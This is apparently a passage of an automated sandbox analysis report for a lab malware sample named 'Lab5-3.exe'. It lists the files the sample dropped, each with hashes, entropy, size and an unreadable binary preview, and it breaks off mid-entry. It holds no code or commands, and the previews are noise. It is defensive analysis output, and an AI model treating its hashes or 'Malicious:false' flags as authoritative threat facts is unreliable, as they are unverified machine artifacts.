                                                                                                          Preview:`..t........A.%...Z..Tw.......".2.).....(....0E...A.s$.......o"./.\......tA....(...hq..v<..).....z...E.....9E..Ye.....V.{.G.....FnRUZ..#k..R..QM.".<....[.P..?0..Ja..E|..a5..z>1)9.#..?.N|.4c.9......V..Y..N.NA....3...*o.....Q6..]......m....Q.U...Mb.Q....V'.b_.o4..-..)....9.e2.=zlL..)..Z..Sa....p(>;}&.kj.9....wFB....Z.Kge....ZRV2..)....RR.".rG..\%.~.......%.W.....;jT.k......Yk}b/..nE.^.|.......ajh.tvQ.?{..&&#...._Y.U........;..|B"~9.r.../..*.;....a3.=.0|.8............ .AA:...}D.@.0.t.sy.). .<*...o.Q.J.:...._!.#.u....,....k.r$?>..I_......7.......).C:..[..I....8...|.C]..!.|.l.[.\..S..h....Z}.....9J?'....d..m?.w.k.m..H."....wI.....0@...O...<....A.6..xQ^...o..>.:..e../..G.9J....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.913887166466318
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P1VQtYZnJNhsFoYKJ3qHfUTid3hBaUoSGFcmeykEdEElU92i:P1FnmFxCFGx0uKeY2ElUJ
                                                                                                          MD5:AEFA8EB45EB81FF5C8227D47DC26FC1D
                                                                                                          SHA1:B8F821227688D99236ADD89DE16D3F7C0D8C3CF1
                                                                                                          SHA-256:33534D864F9DFF7A69E78A4BCD7B9A98B6276AF25DD51D874DDDD4CE8717E56C
                                                                                                          SHA-512:DE4D88D826271C0E2187F86CBE93791C4A0125D70283DA050C00CA19C6F41E4412FD37F3CB1986A6EC6AEE56D5E2FA7A5AA33A90D51550C3B060DAA8BB35F68E
                                                                                                          Malicious:false
                                                                                                          Preview:..0...|.Ip.A[.h.[..E.....,1...fhd&......J....3....Y.E1x(..;......N..........T.....#x7.&..:...3..L...$.....I..W....!..R.`..G,..<..P|.Bug.............ZPs<.........!...'0..<.%R:..\.L..}Y.y...r2o.E....-:...<.7...Y....Lq..{.w.8....`.k.OZ$. ..J,)z'.5+.n.'.....'......X.t......h.PS.Y.V..0.s.V}Q..d..q)..cQ....[....t.YyI...)."(..5.A...\...P..vqhj...dh-.i.U...\D...q?......m.....?.D....8......^c.....F.>@.[.cZ......<#R.>.fY.D....0s:q.k..........m..rWP$.i.}.Q.qwr.d.H(0(.Z.....w.|h(..`..2....;.k..f..o..~.Zg.t..0..'r.z..kyC.....V.v....N..>/..x....sM.3<.j......0.G...f...0.O8gv.8K$.i..K[...f....?....3....!.e.pu........_...."......F...I..A.g......`..^.7f_I..S._fY.o..t[*....P..}.dP.,....6........<..!5...P.9...".7d.".5{.N.w.\V..>.....2....qF..8..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.911055176448446
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Bp0iAzVHYHL7XZOCb3HfUTid3hBaUoSGFcmeykEdEElU92i:BqirHL7XZLcGx0uKeY2ElUJ
                                                                                                          MD5:29163FDBDD7BFEC4EFE88B8DCAF5050D
                                                                                                          SHA1:8433C1072D20E9A2CE315011E6F5DB4F31F28BF1
                                                                                                          SHA-256:4B026453641F90D5E10AEA40534125C22868B19813EDEFB470D20165CAF003F1
                                                                                                          SHA-512:A7A7FA3595710AAD8193ACA59238501C3C91AC231219FBB9F2D4277FB8EE847F969D18A8C28CCAB6212254E9CDD99923E2C5130D03DF185B0868B0D0BB75F623
                                                                                                          Malicious:false
                                                                                                          Preview:z:D6..W.%.3..&....=...H.*..|....Zp. %.....ud[...l.s.....y....%zy.5.{.x..+.=.R.3f.V.B~.s..O.9"Y..0.0.....w.orO0C..;.%.....jJ.o.|....c6'...C..W(......b.#sgjG..T).....}....}.R.@...\......>.?s..{[......^.m^Yn.......aK..U,~...U...T....#.}.K5.......X.....Nb..p...Z|...xH=...l.d.k.h.l.....e.s.....mF.{.F./:V.@.....x..(..Z.-Z;A#.n.......$...*.......~../.......(.*...U..T.b-.......".T0-c...r..)..]....M.}..n..n>4+<...@{k...../<..[u.kZ.S<{&..LK.=..q.Z.(~.u.e.?i.O..........%+..P..Q9..!L~.r.....f...=..t........D...3.FN....Q..~...rf>)-..w...%n.../.yQ..5...CG1.Z..;..@.R...rS.[=o7..NU...'.L(n5o......@.q<..n2.kH..ib...c.Ho.%x...c.Ej.E.".~k.y1p....e..".)....W....G..fO.....QR......v%..R.%'..f....p.C..Q.....wm.F=<N.+I.......(q..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.901305831722974
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Xl7h3vOGSu+78p4HfUTid3hBaUoSGFcmeykEdEElU92i:XnlSu+kGx0uKeY2ElUJ
                                                                                                          MD5:D9B6B21A7DF1D2ED4C4FFA0897D5EC76
                                                                                                          SHA1:49E82EB9F0263F5C2203471870F0D975B53814CB
                                                                                                          SHA-256:1387F4ED358AE2B89769D091BB134A8381927604478B3C198B6950B52904188B
                                                                                                          SHA-512:268B260380F2CE20F67A0980C7A49AF440C77A74DC35240B32B4062DE1D8518AB883EFFF1DE2BBEB8B216AD1F2B4831711900882DF2152D064542EC327759B50
                                                                                                          Malicious:false
                                                                                                          Preview:6....O..Ey.....L.Bb......2.n.a`.....]4./E.u2..p.S.v.W..........'.r....1..3..A..`[....4.Fn...h\..G\!.......9...3Oo.|.o.2....Hk....qLw..;~a|.p..A..>S........)7...'...^..B....BFe.....~.m.w..M4......6n1...+.2.k.R.{..LY.]T......N.e..../.5P5.W...5.}T.-.N|...P...B.-.I.........t+3]...0jL..r....l."EU..*.@4t..db..'..htKm..Lh.#/.$../ ..e.I.A...4....|..n..aT..R.7...V.2.......9.'kk...<...OR....R"..T..R......n:.U..FAn..b..V..kk.F~..3.k.W.f.].%..e.X.-C.H.gM.....3.#....y....oy...S.Ss...Yw..L...(..3.K.&}.gb.ug....g...nc..P....'....+.O."g..1.ge......) .|Q. ...2#.\u..M G.:...6..IQJM..dF..."...'.i.Z...0.;Xr.(....,b.A.Q.",.MM..C..z.$.|...PC..hDo.WMp.ieJ.W3.57..M.p.7"...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.925662282164574
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+zjcfybSKbeR28Lh5fYJUj6pzvHfUTid3hBaUoSGFcmeykEdEElU92i:6bSKbeR2ihiyj6OGx0uKeY2ElUJ
                                                                                                          MD5:2B5A214C08DD74AF72D96B1A9E03CCF1
                                                                                                          SHA1:E8C53C6C523E1C0640F1D4DAE50C713C59EE9188
                                                                                                          SHA-256:11672D5E3D8D1924989329DF9EDF24C50C3405D48256130E8D274B96FE8A9B59
                                                                                                          SHA-512:7D10B02150A20AE28253C81197E46D427D6CF199A7E618D29724678DE61FD5A199D3207CE73B0890A3AFBCCC2C08DB670A0EE35DB59B6DF9936B6A7AF093C4CE
                                                                                                          Malicious:false
                                                                                                          Preview:,..+L.O..;h.....~...T............p..j*CTO.)1r..K.E!m.Ba....L...rq.E..E.p....h.^..c..X...!..;Q.w8U....+...1#.....DX.x.}H...d.l..#...@F".@.)<$g...h0b...0.F@v~i..F|{..V..r....H...[...c...(.yv....;....s.4j.v6.3....Ij......5..ck....bOW.(UN.^b........_..4.>)..*....QL..$R..P..Q....f..(.f.......~X...W$.........$.]H..X.F.M.1......:...4..(;l.f.%.d-..#[5.#.y....o...=.}>.y......%.sT.E...X..q=.....g^'..3..-7.v..;.Z.+...W!..K.S....te!.z./@17..dO..sz.......).n.v........'I.5..U...!..7e..........0..n.X......a.'!.o.%r.,....$........<..N;...".#p/....=.@\.E.<.l..1z...=!.".....H.e.zuJp)...%........i (...>..jl.2x.I:0.I.).~<$....W.tA.c#v.z...9...}3.x.u.vO..j....j..n.t.c...D.&.\...,h...U...w...+....OMj..S..U..2.....K.Eh..q...`.......&&+...e.i....z.....].fo.u...L.3pE..0AoF.e.^."...>...B.!JT.*.`..O.&..=Lk...wJ....._R.|o.8......Q...*.../.y.#..LL.%..].....(a........=.#..#..G.R.K.A.[......p.......yj..N.cC.+.4(.....,.A....,..D.)a.*A.SP..&..Md....^*....&....82..j[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.924080981398295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xylU9q2Gnv7h3SA/DBze5HCaiVRZHfUTid3hBaUoSGFcmeykEdEElU92i:cRnv7hXNqTTGx0uKeY2ElUJ
                                                                                                          MD5:7CB899ACB6F98E8BE4522384B50D7013
                                                                                                          SHA1:1A875956F5CEFAA42DB23469497EE07F10A7154D
                                                                                                          SHA-256:BBD459F2F846119D133F2D5B220C14BE8C4182D50D69619BF1BAC9C92E0A8A32
                                                                                                          SHA-512:D3A39E8E62191AD1333A42B4AE8D4ADA63F011A69CA89BA442AAE3C2DBB40A6A7628EBF193F4CCC321C5C4F9D378906934E791515D3D9CDC004AB8E77AE3A4C2
                                                                                                          Malicious:false
                                                                                                          Preview:..7..\`qb>.....3..5.K....Kg8Q?..M..2u.5 ..H....d.!.p/.bNb..Gd..5._.....c.[..7.e.~...Y.S.9.8.b..oa...7....*.V*]Zc....?s...O....a5.......*:[.......x0L*...].C.....#..H(.|...@..3..$.o0{"{........ZW..8..,.M[..~...+......m7..j../.E./.IP...Y;...H.K..X..9...........}......~....Af...t.b].D%..N....M7.L0e.}...{.3...t3...gu.J..................6Qx..|.Q~......i.q...bz...a:...+w.H..27c*.:2.y.c/.g...9.....=...?.0.b....{..W{.|..M...j.....t._2.{.s....5......^.....O....`Ge......p.-.2.U.=E.:...{q..{F>..8.?"..'..}.L0.i.6...jeGj.Z..d.D..B.V%/tn.e..a......K..3..v..*...7.{.N...OQ.~p..Y...<f.I.[..$#..P.c*.}Y\..p..*...j.'.#.+.*..W....'....P..4,8....r.M.]S.....6...P.._.`......z....p.....ZRc...e..J.....e..(PC..ar...(.".$'jbQ...-.PS)..?...))x;........Dl...2%...8...+..Z.++=.kn...VV.z[;.].c...zv.*#jw.I..../."..V.f..lT......P...S...Ch....y.^....H...-.)....G..v+.....7Ng..F.)...w.,.`...h.yxP....!..k".N=<.3eMq<7....S.d...^.FL{.(..s.u....o.%...r%.>.g..J ....Um|;.d.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.9470250793504364
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:owanfh0THOv88tGQcPzcx6KU3WGx0uKeY2ElUJ:FaOy9wnN310Cb
                                                                                                          MD5:05CF74DEF2CCF2E1C3B047EEC37DDC7E
                                                                                                          SHA1:48415A3A8782C2A61DE0B234AD0F1F0A39E9C96B
                                                                                                          SHA-256:893C777F648A2F77C685DCB2283CF3DAEE8812912401B6CD065E8D3349813BEC
                                                                                                          SHA-512:82F9B963DDE890EABF5D7AE0AD3FA2AAB6013028D10CF6AF8C6E8FC24DA77A63A4D3E7C1E55D533D9CBB9FF67E227231F7816700F3A52B24BECB0165051EDEAA
                                                                                                          Malicious:false
                                                                                                          Preview:.;.).sb....y5l.~(._.6.X.....>.!?..b...]..U.VO.d7.Wy)...<...7....F.k..=.......T...SRt.+..)........Y.;....+$S.D.7i.\...8.[..Q7.vAoc.....4!}...Ju..-x\..k..^.........../..<.M...Y..e........#q.v...e.?>.....p..|.K...$./...^.ZY......t....|P1...=u.A..m"....c.+(.m.p...-......2.<.(..&x.J..:q..i..o...).9."e[.U....nn...m..}.y.{.>.{.nM.6.~$.2.d_/....!.....i....7.....t..m.......7.r{0.GXa...J.r..VYo..6...m.%m...T...m@..o3r.7.......T;1...1..d!.. ..'.....x*n.^1o._.."0.'..D.*..|....k.:....;Y...~...e.....2..wc.J.........N.. ....r.\HT....'..6..~.b..N..>nX.e.. ....Qi...Om....l...<.<...[.8hs.5....^X^.ZO.fq..M...6}td..m=.b"...T. ._.~...u.J$.t.8..J....W.J.t..c\.@..n..w..S..S..u...H..).1....#../.R._u.x....H<.5tu..]*.....Z.,."P.V...(u.nZ.,o..uV..v....e4.2.Y).T..!...v.B...".x....~..]m.j.w.5h%.o?..|WW....@*.oi.........e:.KN7. :......f....'M...C..C,..1..2.6C,lU.@s........F^..zwg#.I.....E...y.......,...u ..[N.8....@.u<j..3..F.Y........6.....>.K..Pp......0.....C`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.939417560648793
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4dMirZDxe1ZjnHHQkL/0wHfUTid3hBaUoSGFcmeykEdEElU92i:xit9SQlGx0uKeY2ElUJ
                                                                                                          MD5:A5747902D51ECDC42A05770F0098B722
                                                                                                          SHA1:A015F113F2C9F8A2274275335A00E137E97DF9CC
                                                                                                          SHA-256:EDB81CCAB756694EA4E8EEB014BA1C3FFC9CB95C812C4CC474A27C36035A3EEA
                                                                                                          SHA-512:56AB99FCE0326838D895919037DF745C93A3A7E5B5F3BB81E1CB80D3F255B0EB20C45CF34DE2070583193009AFC24712A171DBD0A9F0846C0887BBAE5125C49F
                                                                                                          Malicious:false
                                                                                                          Preview:b....^..........Q..Ha.E..S3Y..f......hJ:.......B...(...O.`...Z)..|oN. .!C.y~-Q.o........ .?.nue.>.Z[9r.t...F..>9.....8..P...-7..N.d.......qRt......5....0>a.R....../.2.......8fY..'8.#.F.....pLQ.w.........m..4...k<..'.Ad...f..29.1..Z......7i..0 ......9Pl.QY..w...1m;Q..@&..5.YT.Nc...OQ.oF.w......R\....u]e`.....:K.n..W;D@..P.e..|..Bi..F..S.s&.......t..+..T.[...*g..n./.}r..kO]&^.......i..c.....b.=M<.}.._....g..6e.<%Ab9...)vh...=%g..-..v....$...X..,.P.......A.mS...O.485.\....p[}E. m...<N.B2.n...4.*V..,...qu]....M"....a.J...._....3...l..+.OP...n.Q...a..".?..."......ev.e.5.ZhA.n..&#.Y..u#m..g.M..s.V.\z,..*.}.7.(Y.Hk..kU....i....T60u.].....akF.$./.....t..v.WW..=....8.?C........0.. ...q.8..d-..%...9V..v...b....].-1VyM....$.%.2.wx...............).oh.. .&.n!..z..h....:&...H..X.Y`4.EY)....y.6.:E.W..PB..S.7r...0Ly...I....AlF.j[.. ..`K.X.().r&p...WQ....P.6..r.k...s...Ht|.pr{......J.........)g.Q|...].pV..@...!V.Fq.y...S..x..m.P..}`...i.a..L.\%.{..y.7L....7.*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3264
                                                                                                          Entropy (8bit):7.941314836677569
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Fgub8kOgdJ6MAQTDXYwctCGx0uKeY2ElUJ:/8NgrcoDvcz0Cb
                                                                                                          MD5:E04CFAB9776D059D375C57D885C4BB57
                                                                                                          SHA1:907CC05C8EF7C0035ABE58A001CE2B19B426DAE0
                                                                                                          SHA-256:4779A26A6787911C4433759DB0E6DA43454F049B8FE29496E35243C2A1A890EB
                                                                                                          SHA-512:D6079B7C5D57E1B29CB57BACC0DF54205B8B802EDAF7CF26A804B951D91CBC64ECEB502FD40492BBDBDF57760486734EE88583D790F82119AF4163BEA70B0085
                                                                                                          Malicious:false
                                                                                                          Preview:..$R.!k~?._s........h.._.....on....~..G#,Z.E..~.as.1u.J..]....}c..0Gc...Y.A..w.......5$US...j.),.d=6.]C$]xdjCM....C...,i. ...-..4.<l.P..EP?.!._IK...b......q...Sl.y+..">..|....!z..V......1.a...[.}6.o. ..foWG......;."`c......zg........^{..."x..q.sH....3...5....*...m%@.P3......3.WG..m.aG{.z.B)x$o.`_.t......3...B@I._A:...%..)..,.|x<.U.".AB...aF......}.. 1....."rb.j.M.m....i.$.....u....hz.f.o...g`{..2s;.C.%m...#I..]..+..1W.6..........[...0.....VI..l.Z..=.....V[..Bt...m.....FUi...j..0Sf .Jv..x..a7.....rg..G[;...3qyAza..].`....k..........G..L........V...XE.NO..F.a..z...o8...A...u.........zC....$M.\u."R.. .2..e..GP....X..FI...g)u.....}.y...2..V...p&|...exy.5......RGF........j......M.y.r.f..yu4.t....U.U6....y...W.....2pVg]..(~..B.....s.9..m-.r$pN1U...T...?).:.v..f.E....G...|.Qtg.41..9d.......z&?.VC.....t\.^.]`.....]..|.......[...xm.7....}...a...<HK.`|....D.H..s.j..F......7F......o4.2....m..>...s..}A..6.X6#...J..Y....z...S.I|.!$^s8...2s.j.?.....d.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9408
                                                                                                          Entropy (8bit):7.981797125512098
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:2tgv5PSsIqvaMRyx6DN7FMpFDgGj4P38a512Qt3qvw0Cb:2tgv4sIToD7MXgS8sa5x+wtb
                                                                                                          MD5:2067855F65B8B9C9861EC6794EEFF1B8
                                                                                                          SHA1:FA35C624FC3E5B0B4B666719558C270F2E042392
                                                                                                          SHA-256:568CB4E7B48B0A25408C76939079924F30EBD160A7FECECF1FCF06FAC8AE26A4
                                                                                                          SHA-512:355B50DF9E4B912C8AF67DCCF8619E4B414A54DEBA33622D6D8CCF871C32FF78907B354A289B0CC8907F5F8DD8EF6FB762AB578F0E8B940F1959862DC87CE48F
                                                                                                          Malicious:false
                                                                                                          Preview::..!.pJ./.|G-.......<.c.....`..g...2.......poj....=.f.e._5........1j.w7.....g..W(..$..B|...a..I.....G.r[.....T.A.B...Q(...../.M........w...su..)n.....aZ].....5U..;x../....N..kz.r..J.M.....3<mD...K.......R..u3). .-........0..&.:.....=s?.....Ct{Xu..k.s.#@...2.|2..l...G#S.C#............J...."."....... ..R.....>R.Z.I..)3x3.b02T8........X..:k..*....?z..K..wD..!:m/>..k...g.O.`R..5........n...._[.{......U......[}r.Lfw."..D..[.+...q....Ma..&.aj.=.n(G.oo?%U|...0q..>..g..jG`...f..5.M..V...U....6....."..R|. f.H.}....#.~...(c..|...@..F.3}rH...X.r..4x..o.j.6<~...@.J.rWh~..j&....?.l...1..F."G.=T.Z.6.g....C.-.7.......u^.n.1..JH...g.K.Q....W...z.L.)L}..f..`...,....b{p.j.K....*6.....J<.]E...Z...+...7K....dF5.).,..;.."..V.Y.NZIy...eOX.l.......\..#B,..j<..*C.....A6:.{..m#..sE....^.P/-..G.J.\..J.T..G......|..n...w[q..Z..Oi..P.!.....q.M~...\w...$......_#....q.u...!...3.71.S..L._... ..1,....lk..v...aC..rS....a.C@..[..3s.~._4.vPm...$..F.:`.Q.bX....U>..jh}....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.926296229112433
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5sGbm55VurhE60XVqeCFhRWceUQdiuSxEHfUTid3hBaUoSGFcmeykEdEElU92i:5Dbm55V6Y9C1QNS9Gx0uKeY2ElUJ
                                                                                                          MD5:300C9A844F2454A9A5BAD9B536984267
                                                                                                          SHA1:C8147815D14740307D406DE8751FCAC445795A1D
                                                                                                          SHA-256:5E21BD8C53A9C6A7CDCF4B42B55FC9B8F610A34C62FAFC4006FEB3C7194B2DA6
                                                                                                          SHA-512:183939B0AC615D6C01952AE38D24ABC420315EB1DD8D9BA47765AC89B9375E90C0364806DCAF99DFB507E7153D77403703DB1DFB565589C7BCDDCBA48040D3E5
                                                                                                          Malicious:false
                                                                                                          Preview:....G.K....E.........[..^......Xq!r..{.........e.9..0..|M}../K.4..F.%.....lG.p..A.ZO....O.J.C..}.YlA.;.V.."....<.=... O[.s.....i..ctN....<>..7....,.5w[m.J.K....M@R.v.v..&...A*...$.B!.+..2U..d....sw...._W{...>..X.d-...`..'.....E...Y..$.}....l.....@.A?...d%.....\.<xx'.%?.c3........L.(.y+C.....2..=..............Y.{1.V.....A.........Kd.....7$..PS..I,...5.{3.I....'KF!...>....4b..D6..Fz.^oS.[.J......*.lu..R_... 2..'y!..............: ..........'..z.....?....i...|..t..Z"...P.PG..:-.CX..<O...|n.O..".6.codCo=c.._../3..+..`....\?d.....g.t=..{~...C......X#W...X..uKy..\.5..h...0 ..[..|.J|..:..7.:..f.....N..KG.....n..5W.....*.t%...~w..p...j....X..j.'T..Pk.+*Z....@=s'k.rY.A0.0.C..UB.>...I......;....t...".n*....`.C_....B"...r.....)B%..y.^...}..L.*8D......ZY......%...t&b.....k.#....3...v.#..y.>.g..L...G.-k....%.0.aPR.%.Z. .....4..}A...t..z..m.i.5..|.(#.2&.L....0[e./..5F....9.l..iy.5...pA.#.)[..xm..2/Jy....*.F....F9Ut.X...AX..(8&.....%...+}(M..-....V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.93573048261722
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zHxkJYcyUoRcFFDR4qecOpWHfUTid3hBaUoSGFcmeykEdEElU92i:tkbyUoRK0qR6Gx0uKeY2ElUJ
                                                                                                          MD5:093F3D4F6D2498D819A36C07B1BB39E9
                                                                                                          SHA1:D3116289A018C30E3005511FFD7CF65FB30616EE
                                                                                                          SHA-256:93ADF5615D881B4364C3328E84E792DB4EFBE2689278E28EEC9999AB4160D735
                                                                                                          SHA-512:3E8C557B4C1874538D3A530A809116B9F14562EB9C737FF95B9321A099EB338D9AC1CFBD33C897CEFEBA1D54B3212FA8A5438CDF0E60EF0E44F819F1FDC3F468
                                                                                                          Malicious:false
                                                                                                          Preview:..SW.V..V..G.Q)..5..1#!H.E:?a.?m........`.%`.R....z4......"f.....a.......D....-..IZ..c *..R.SX.2...~Ex).._..f(.p.4Z....A1R...c....].q..pukYu.z.X..[ 0.L..B....P........c..(.Bl[T.,.F...U`.2..r.S7......F.$*C......2."f.......l6..C.n.Rq.].&...-..I...C.%..I..dX.=.e.....7...#......WG...W.Wj...*S.UAz"./.....K... 8.L&..............$28(.E.-Q.b10"..t%.KX..$L.....u..G...8..T...aeYEE...3...<.k.....).O......J;..8ncy<..Otb..A..,......7..f.E.?..Q.%.r<.-!:.....z...G.-.a....gq...0V...G)U......d.z@.$..`G...e,.......6..YR..4_...H..E...0[.CfB.f,6.)...E..V'.>....;.......h..B.s/...lB..G.k.pGh...2....."...f..s...Zv1M..wI...G.....}..m..USVF&...(.,......`..A..wt.`..J....d.._.....h.....Aj....t.....b...+?...p.R..D..|..!vd].......=h.....~1.-. ...#d..d4..t.....n...'..P8.....7..........j....+.4.p.n=@:...v_?'....Fa.x..f..1Kh.3.......Q.Jr.w..\...i..}......}....t...E.5.L.c...y.....=......h...0W...:.T.L^UA.V.....&\.. .*'*..g..b.M....../...q.5._...0N.y............e.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.909727453504719
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:alHDfgiBEG6r1A23fSMD+HfUTid3hBaUoSGFcmeykEdEElU92i:if5tUdqMdGx0uKeY2ElUJ
                                                                                                          MD5:B178E8CB099F3DD7F9E2A28BAFD13B57
                                                                                                          SHA1:6AA179B118DD28F14BFE91D5FEDDFD65965F1AFE
                                                                                                          SHA-256:D62015DEBDF9FDEEBA1E24970B4BC1A31EAAB7E5C7647AF6747C4AA5544751E1
                                                                                                          SHA-512:1CFA7BB27B7DA21340D708976ED08FF43064AF5555756679704F29CD8466E774DEBE660681B3A58D70956EEF74A4E480D90272D77F29CA2127B9FF4E53BA13B6
                                                                                                          Malicious:false
                                                                                                          Preview:`.....}bd../,.J.a9..kswj.#H..e..'...Sz...ORpS...%R=.m.E.......oI6..$.j.....\W~.p...%.T.)2. ..(V..3^...x/.82F...r.t.:KNoZ.......{.J.g....3.En5.. .P....Gw.D...M..y...r.xL%i...y. .e..N..n...Vv\j..Y.m.+.Y....). .q..k.k....e.q......}.G.k..y....1A...:..T-....]..k...;b.-..y.......$V:.]..U........1wJ...dE...3i...C.(.i......A.o.qgD..6.]k....`.....{....Z.-...\..9#....f.3+m.........%..%.W......bI.=..=sdP\C.7..L..(-..t.s{.T.x.@...D...Ta;..u#t6.f...o%..E....L.rId.$.+`....!3.f...9....&.#Z.9.t...kY.3..s.,........v}..Bn.|e....I.S...&z. xj.7=..8...A..qF.P(.......V...q...N...$(.S...DO..&....t.eV!#7..x.Wm..y.d...N./\....M.me]6.!.. ..l'.....)... .w;...H.8..=.q jl.8H.........UB......n..W%......$.4....M./.4,i?...:E8.v......r.V..W.......}.....j....3.........^..A@h..Tx../...++Y.c.4<..]y...L............q.MJb\....+.._lf#^....wC.us._d....j.s.Ku...[...n....$.C...$..`.a..........h....>z..6.X.~.=o.@h.x..&.HO.LA.*.*;.7u.q.....Mu..b6..P.(..p.)........!.@..@t._
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.919371826047156
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TxvIEduUuvSjzbo4ygYJgDsZsHfUTid3hBaUoSGFcmeykEdEElU92i:6EdfuvSkvgilGx0uKeY2ElUJ
                                                                                                          MD5:6C25488A458BAFDAB700827888B20F19
                                                                                                          SHA1:D263AFC74B806EB1BC7D1E06C77B6ACB18F2F922
                                                                                                          SHA-256:928F0A5BB6F1FE9CC43E94917CA62977008E58B13DB166117B14162705396607
                                                                                                          SHA-512:AAB630D112785803AD78DD7DABE6789DCEE35DD4715F41F607C5DE36B27B3C888BAF2D66EE3CB09A34156A7D424D9EE819A278A80DF1BA4212086E5020755EF2
                                                                                                          Malicious:false
                                                                                                          Preview:....@.H.....%...;..........F...\}v.P.R.P.k_Mgp.m'.........0*'....0i...bm..'+H...P].R...G.2.V...)...... <.......=.e.....Ys../!..fc..P:...!.../j.*.]>..*_&...X....).....EP.'.1.g.#.k..}uX.3..T....`...<..........Y..J..#.T..F."j.(..s.3.]..L..........vd....h.!.!.c.......[.;F..9=.D@3...D.T]x..s....#..../..l..q.#V.d!.m..@..}...+.3I=...^I!?.q...t....,...{._..........ly?l{..8Mi..Z..?.\.Z2..w....@..,{.MR....s?....h~..f.9|....:&b..y:.#......''.Y7...(2N.u_k...hE.7.-&..8:.....3w.r.`(.*&<..].3._Z..6...o@}.p..4.t.QI......3..0.H...R.DW.......C...+....YI..~.98.....<.U.al+).!#..?.......Bf..4..l6-..<>...n..k....$..+&D...u>......%I..Z..7....m<. ..,$e.........Y.....&...!.~.X-.%;7.F..........F......\+.....!Lqm.0..?}.S.P....K.D...5...#/..:fY...y.....<.r..P-1|G.-:n.z......<...I.c........$...W...-....e..!...&.....w.p._.J.lh................=.....o..z.}j..f..Z.I.Z0...n..R...b'BT.F.K.7V..b,U.c........{..6....6.Q.].F7...$ZW3...z...B.....e..5.a.......<.'......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.92513354285317
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TO/k+FyPt9+SiAqhZJNXJmpR8HfUTid3hBaUoSGFcmeykEdEElU92i:TOM8q+SXqhhXgPGx0uKeY2ElUJ
                                                                                                          MD5:5DE2ED0F66C4A53C862AE5C769B7984B
                                                                                                          SHA1:2168431B51D7FDE025FD0947E97A59CA65530FCB
